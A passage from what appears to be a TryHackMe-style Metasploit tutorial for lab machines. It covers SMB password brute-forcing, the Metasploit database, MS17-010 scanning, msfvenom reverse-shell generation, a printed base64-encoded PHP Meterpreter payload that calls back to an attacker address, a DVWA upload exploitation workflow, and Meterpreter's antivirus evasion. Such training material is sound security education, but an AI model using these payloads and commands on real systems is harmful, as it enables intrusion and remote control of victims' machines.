[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:devdev',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:devdevdev',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:dirt',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:dragon',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:earth',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:fire',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:football',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:goat',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:goat',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:god',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:guessme',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:hugs',
[-] 10.10.183.196:445 - 10.10.183.196:445 - Failed: '.\penny:letmein',
[+] 10.10.183.196:445 - 10.10.183.196:445 - Success: '.\penny:leo1234'
[*] 10.10.183.196:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >
The Metasploit Database
You will first need to start the PostgreSQL database, which Metasploit will use with the following command:
systemctl start postgresql
Then you will need to initialize the Metasploit Database using the msfdb init command.
root@kali:~# systemctl start postgresql
root@kali:~# msfdb init
[i] Database already started
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.3/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
root@kali:~#
You can now launch msfconsole and check the database status using the db_status command.
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 >
The database feature will allow you to create workspaces to isolate different projects. When first launched, you should be in the default workspace. You can list available workspaces using the workspace command.
msf6 > workspace
* default
msf6 >
You can add a workspace using the -a parameter or delete a workspace using the -d parameter, respectively. The screenshot below shows that a new workspace named "tryhackme" was created.
msf6 > workspace -a tryhackme
[*] Added workspace: tryhackme
[*] Workspace: tryhackme
msf5 > workspace
default
* tryhackme
msf6 >
You will also notice that the new database name is printed in red, starting with a * symbol.
You can use the workspace command to navigate between workspaces simply by typing workspace followed by the desired workspace name.
msf6 > workspace
default
* tryhackme
msf5 > workspace default
[*] Workspace: default
msf5 > workspace
tryhackme
* default
msf6 >
You can use the workspace -h command to list available options for the workspace command.
msf6 > workspace -h
Usage:
workspace List workspaces
workspace -v List workspaces verbosely
workspace [name] Switch workspace
workspace -a [name] ... Add workspace(s)
workspace -d [name] ... Delete workspace(s)
workspace -D Delete all workspaces
workspace -r Rename workspace
workspace -h Show this help information
Different from regular Metasploit usage, once Metasploit is launched with a database, the help command, you will show the Database Backends Commands menu.
Database Backend Commands
=========================
Command Description
------- -----------
analyze Analyze database information about a specific address or address range
db_connect Connect to an existing data service
db_disconnect Disconnect from the current data service
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache (deprecated)
db_remove Remove the saved data service entry
db_save Save the current data service connection as the default to reconnect on startup
db_status Show the current data service status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
If you run a Nmap scan using the db_nmap shown below, all results will be saved to the database.
msf6 > db_nmap -sV -p- 10.10.12.229
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-20 03:15 UTC
[*] Nmap: Nmap scan report for ip-10-10-12-229.eu-west-1.compute.internal (10.10.12.229)
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 65526 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49158/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49162/tcp open msrpc Microsoft Windows RPC
[*] Nmap: MAC Address: 02:CE:59:27:C8:E3 (Unknown)
[*] Nmap: Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 94.91 seconds
msf6 >
You can now reach information relevant to hosts and services running on target systems with the hosts and services commands, respectively.
msf6 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.10.12.229 02:ce:59:27:c8:e3 ip-10-10-12-229.eu-west-1.compute.internal Unknown device
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.12.229 135 tcp msrpc open Microsoft Windows RPC
10.10.12.229 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.12.229 445 tcp microsoft-ds open Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP
10.10.12.229 3389 tcp ssl/ms-wbt-server open
10.10.12.229 49152 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49153 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49154 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49158 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49162 tcp msrpc open Microsoft Windows RPC
msf6 >
The hosts -h and services -h commands can help you become more familiar with available options.
Once the host information is stored in the database, you can use the hosts -R command to add this value to the RHOSTS parameter.
Example Workflow
- We will use the vulnerability scanning module that finds potential MS17-010 vulnerabilities with the use auxiliary/scanner/smb/smb_ms17_010 command.
- We set the RHOSTS value using hosts -R.
- We have typed show options to check if all values were assigned correctly. (In this example, 10.10.138.32 is the IP address we have scanned earlier using the db_nmap command)
- Once all parameters are set, we launch the exploit using the run or exploit command.
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > hosts -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.10.12.229 02:ce:59:27:c8:e3 ip-10-10-12-229.eu-west-1.compute.internal Unknown device
RHOSTS => 10.10.12.229
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 10.10.12.229 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
If there is more than one host saved to the database, all IP addresses will be used when the hosts -R command is used.
In a typical penetration testing engagement, we could have the following scenario:
- Finding available hosts using the db_nmap command
- Scanning these for further vulnerabilities or open ports (using a port scanning module)
The services command used with the -S parameter will allow you to search for specific services in the environment.
msf6 > services -S netbios
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.12.229 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
msf6 >
You may want to look for low-hanging fruits such as:
- HTTP: Could potentially host a web application where you can find vulnerabilities like SQL injection or Remote Code Execution (RCE).
- FTP: Could allow anonymous login and provide access to interesting files.
- SMB: Could be vulnerable to SMB exploits like MS17-010
- SSH: Could have default or easy to guess credentials
- RDP: Could be vulnerable to Bluekeep or allow desktop access if weak credentials were used.
As you can see, Metasploit has many features to aid in engagements such as the ability to compartmentalize your engagements into workspaces, analyze your results at a high level, and quickly import and explore data.
Vulnerability scanning
Metasploit allows you to quickly identify some critical vulnerabilities that could be considered as “low hanging fruit”. The term “low hanging fruit” usually refers to easily identifiable and exploitable vulnerabilities that could potentially allow you to gain a foothold on a system and, in some cases, gain high-level privileges such as root or administrator.
Finding vulnerabilities using Metasploit will rely heavily on your ability to scan and fingerprint the target. The better you are at these stages, the more options Metasploit may provide you. For example, if you identify a VNC service running on the target, you may use the search function on Metasploit to list useful modules. The results will contain payload and post modules. At this stage, these results are not very useful as we have not discovered a potential exploit to use just yet. However, in the case of VNC, there are several scanner modules that we can use.
msf6 > use auxiliary/scanner/vnc/
use auxiliary/scanner/vnc/ard_root_pw use auxiliary/scanner/vnc/vnc_login use auxiliary/scanner/vnc/vnc_none_auth
msf6 > use auxiliary/scanner/vnc/
You can use the info command for any module to have a better understanding of its use and purpose.
msf6 auxiliary(scanner/vnc/vnc_login) > info
Name: VNC Authentication Scanner
Module: auxiliary/scanner/vnc/vnc_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
carstein
jduck
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The password to test
PASS_FILE /opt/metasploit-framework-5101/data/wordlists/vnc_passwords.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 5900 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Description:
This module will test a VNC server on a range of machines and report
successful logins. Currently it supports RFB protocol version 3.3,
3.7, 3.8 and 4.001 using the VNC challenge response authentication
method.
References:
https://cvedetails.com/cve/CVE-1999-0506/
msf6 auxiliary(scanner/vnc/vnc_login) >
As you can see, the vnc_login module can help us find login details for the VNC service.
Msfvenom
Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads.
Msfvenom will allow you to access all payloads available in the Metasploit framework. Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many different target systems (Apple, Windows, Android, Linux, etc.).
root@ip-10-10-186-44:~# msfvenom -l payloads
Framework Payloads (562 total) [--payload ]
==================================================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager
android/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell
android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
android/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager
apple_ios/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)
apple_ios/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)
apple_ios/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
apple_ios/aarch64/shell_reverse_tcp Connect back to attacker and spawn a command shell
apple_ios/armle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)
apple_ios/armle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)
apple_ios/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
Output formats
You can either generate stand-alone payloads (e.g. a Windows executable for Meterpreter) or get a usable raw format (e.g. python). Themsfvenom --list formats command can be used to list supported output formats
Encoders
Contrary to some beliefs, encoders do not aim to bypass antivirus installed on the target system. As the name suggests, they encode the payload. While it can be effective against some antivirus software, using modern obfuscation techniques or learning methods to inject shellcode is a better solution to the problem. The example below shows the usage of encoding (with the -e parameter. The PHP version of Meterpreter was encoded in Base64, and the output format was raw.
root@ip-10-10-186-44:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1507 (iteration=0)
php/base64 chosen with final size 1507
Payload size: 1507 bytes
eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzEwLjEwLjE4Ni40NCc7ICRwb3J0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFjaygi.TmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7));
root@ip-10-10-186-44:~#
Handlers
Similar to exploits using a reverse shell, you will need to be able to accept incoming connections generated by the MSFvenom payload. When using an exploit module, this part is automatically handled by the exploit module, you will remember how the payload options title appeared when setting a reverse shell. The term commonly used to receive a connection from a target is 'catching a shell'. Reverse shells or Meterpreter callbacks generated in your MSFvenom payload can be easily caught using a handler.
The following scenario may be familiar; we will exploit the file upload vulnerability present in DVWA (Damn Vulnerable Web Application). For the exercises in this task, you will need to replicate a similar scenario on another target system, DVWA was used here for illustration purposes. The exploit steps are;
- Generate the PHP shell using MSFvenom
- Start the Metasploit handler
- Execute the PHP shell
MSFvenom will require a payload, the local machine IP address, and the local port to which the payload will connect. Seen below, 10.0.2.19 is the IP address of a Kali Linux machine used in the attack and local port 7777 was chosen.
root@ip-10-0-2-19:~# msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3020 bytes
root@ip-10-0-2-19:~#
Please note: The output PHP file will miss the starting PHP tag commented and the end tag (?>), as seen below.
The reverse_shell.php file should be edited to convert it into a working PHP file.
Below: Comments removed from the beginning of the file.
Below: End tag added
We will use Multi Handler to receive the incoming connection. The module can be used with the use exploit/multi/handler command.
Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.
To use the module, we will need to set the payload value (php/reverse_php in this case), the LHOST, and LPORT values.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set lhost 10.0.2.19
lhost => 10.0.2.19
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/reverse_php):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.19 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) >
Once everything is set, we will run the handler and wait for the incoming connection.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.186.44:7777
When the reverse shell is triggered, the connection will be received by multi/handler and provide us with a shell.
If the payload was set as Meterpreter (e.g. in a Windows executable format), multi/handler would then provide us with a Meterpreter shell.
Other Payloads
Based on the target system's configuration (operating system, install webserver, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use:
In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen.
Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
The .elf format is comparable to the .exe format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to accord executable permissions. Once done, you can run this file by typing ./shell.elf on the target machine command line.
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
All of the examples above are reverse payloads. This means you will need to have the exploit/multi/handler module listening on your attacking machine to work as a handler. You will need to set up the handler accordingly with the payload, LHOST and LPORT parameters. These values will be the same you have used when creating the msfvenom payload.
Meterpreter
Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter will run on the target system and act as an agent within a command and control architecture. You will interact with the target operating system and files and use Meterpreter's specialized commands.
Meterpreter has many versions which will provide different functionalities based on the target system.
How does Meterpreter work?
Meterpreter runs on the target system but is not installed on it. It runs in memory and does not write itself to the disk on the target. This feature aims to avoid being detected during antivirus scans. By default, most antivirus software will scan new files on the disk (e.g. when you download a file from the internet) Meterpreter runs in memory (RAM - Random Access Memory) to avoid having a file that has to be written to the disk on the target system (e.g. meterpreter.exe). This way, Meterpreter will be seen as a process and not have a file on the target system.
Meterpreter also aims to avoid being detected by network-based IPS (Intrusion Prevention System) and IDS (Intrusion Detection System) solutions by using encrypted communication with the server where Metasploit runs (typically your attacking machine). If the target organization does not decrypt and inspect encrypted traffic (e.g. HTTPS) coming to and going out of the local network, IPS and IDS solutions will not be able to detect its activities.
While Meterpreter is recognized by major antivirus software, this feature provides some degree of stealth.
The example below shows a target Windows machine exploited using the MS17-010 vulnerability. You will see Meterpreter is running with a process ID (PID) of 1304; this PID will be different in your case. We have used the getpid command, which returns the process ID with which Meterpreter is running. The process ID (or process identifier) is used by operating systems to identify running processes. All processes running in Linux or Windows will have a unique ID number; this number is used to interact with the process when the need arises (e.g. if it needs to be stopped).
meterpreter > getpid
Current pid: 1304
If we list processes running on the target system using the ps command, we see PID 1304 is spoolsv.exe and not Meterpreter.exe, as one might expect.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
396 644 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
428 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM
548 540 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
596 540 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
604 588 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
644 588 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
692 596 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
700 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
716 596 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe 1276 1304 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\cmd.exe
1304 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1340 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1388 548 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
Even if we were to go a step further and look at DLLs (Dynamic-Link Libraries) used by the Meterpreter process (PID 1304 in this case), we still would not find anything jumping at us (e.g. no meterpreter.dll)
C:\Windows\system32>tasklist /m /fi "pid eq 1304"
tasklist /m /fi "pid eq 1304"
Image Name PID Modules
========================= ======== ============================================
spoolsv.exe 1304 ntdll.dll, kernel32.dll, KERNELBASE.dll,
msvcrt.dll, sechost.dll, RPCRT4.dll,
USER32.dll, GDI32.dll, LPK.dll, USP10.dll,
POWRPROF.dll, SETUPAPI.dll, CFGMGR32.dll,
ADVAPI32.dll, OLEAUT32.dll, ole32.dll,
DEVOBJ.dll, DNSAPI.dll, WS2_32.dll,
NSI.dll, IMM32.DLL, MSCTF.dll,
CRYPTBASE.dll, slc.dll, RpcRtRemote.dll,
secur32.dll, SSPICLI.DLL, credssp.dll,
IPHLPAPI.DLL, WINNSI.DLL, mswsock.dll,
wshtcpip.dll, wship6.dll, rasadhlp.dll,
fwpuclnt.dll, CLBCatQ.DLL, umb.dll,
ATL.DLL, WINTRUST.dll, CRYPT32.dll,
MSASN1.dll, localspl.dll, SPOOLSS.DLL,
srvcli.dll, winspool.drv,
PrintIsolationProxy.dll, FXSMON.DLL,
tcpmon.dll, snmpapi.dll, wsnmp32.dll,
msxml6.dll, SHLWAPI.dll, usbmon.dll,
wls0wndh.dll, WSDMon.dll, wsdapi.dll,
webservices.dll, FirewallAPI.dll,
VERSION.dll, FunDisc.dll, fdPnp.dll,
winprint.dll, USERENV.dll, profapi.dll,
GPAPI.dll, dsrole.dll, win32spl.dll,
inetpp.dll, DEVRTL.dll, SPINF.dll,
CRYPTSP.dll, rsaenh.dll, WINSTA.dll,
cscapi.dll, netutils.dll, WININET.dll,
urlmon.dll, iertutil.dll, WINHTTP.dll,
webio.dll, SHELL32.dll, MPR.dll,
NETAPI32.dll, wkscli.dll, PSAPI.DLL,
WINMM.dll, dhcpcsvc6.DLL, dhcpcsvc.DLL,
apphelp.dll, NLAapi.dll, napinsp.dll,
pnrpnsp.dll, winrnr.dll
C:\Windows\system32>
Meterpreter flavors
As you will remember, staged payloads are sent to the target in two steps. An initial part is installed (the stager) and requests the rest of the payload. This allows for a smaller initial payload size. The inline payloads are sent in a single step. Meterpreter payloads are also divided into stagged and inline versions. However, Meterpreter has a wide range of different versions you can choose from based on your target system.
The easiest way to have an idea about available Meterpreter versions could be to list them using msfvenom, as seen below.
We have used the msfvenom --list payloads command and grepped "meterpreter" payloads (adding | grep meterpreter to the command line), so the output only shows these.
root@ip-10-10-186-44:~# msfvenom --list payloads | grep meterpreter
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager
android/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell
apple_ios/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)
apple_ios/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)
apple_ios/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
apple_ios/armle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)
apple_ios/armle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)
apple_ios/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
linux/aarch64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker
linux/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)
linux/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)
linux/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/armbe/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)
linux/armbe/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)
linux/armbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/armle/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection
linux/armle/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker [...]
The list will show Meterpreter versions available for the following platforms;
- Android
- Apple iOS
- Java
- Linux
- OSX
- PHP
- Python
- Windows
Your decision on which version of Meterpreter to use will be mostly based on three factors;
- The target operating system (Is the target operating system Linux or Windows? Is it a Mac device? Is it an Android phone? etc.)
- Components available on the target system (Is Python installed? Is this a PHP website? etc.)
- Network connection types you can have with the target system (Do they allow raw TCP connections? Can you only have an HTTPS reverse connection? Are IPv6 addresses not as closely monitored as IPv4 addresses? etc.)
If you are not using Meterpreter as a standalone payload generated by Msfvenom, your choice may also be limited by the exploit. You will notice some exploits will have a default Meterpreter payload, as you can see in the example below with the ms17_010_eternalblue exploit.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
You can also list other available payloads using the show payloads command with any module.
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom manual No Custom Payload
1 generic/shell_bind_tcp manual No Generic Command Shell, Bind TCP Inline
2 generic/shell_reverse_tcp manual No Generic Command Shell, Reverse TCP Inline
3 windows/x64/exec manual No Windows x64 Execute Command
4 windows/x64/loadlibrary manual No Windows x64 LoadLibrary Path
5 windows/x64/messagebox manual No Windows MessageBox x64
6 windows/x64/meterpreter/bind_ipv6_tcp manual No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
7 windows/x64/meterpreter/bind_ipv6_tcp_uuid manual No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
8 windows/x64/meterpreter/bind_named_pipe manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager [...]
Meterpreter commands
Typing help on any Meterpreter session (shown by meterpreter> at the prompt) will list all available commands.
The Meterpreter help menu:
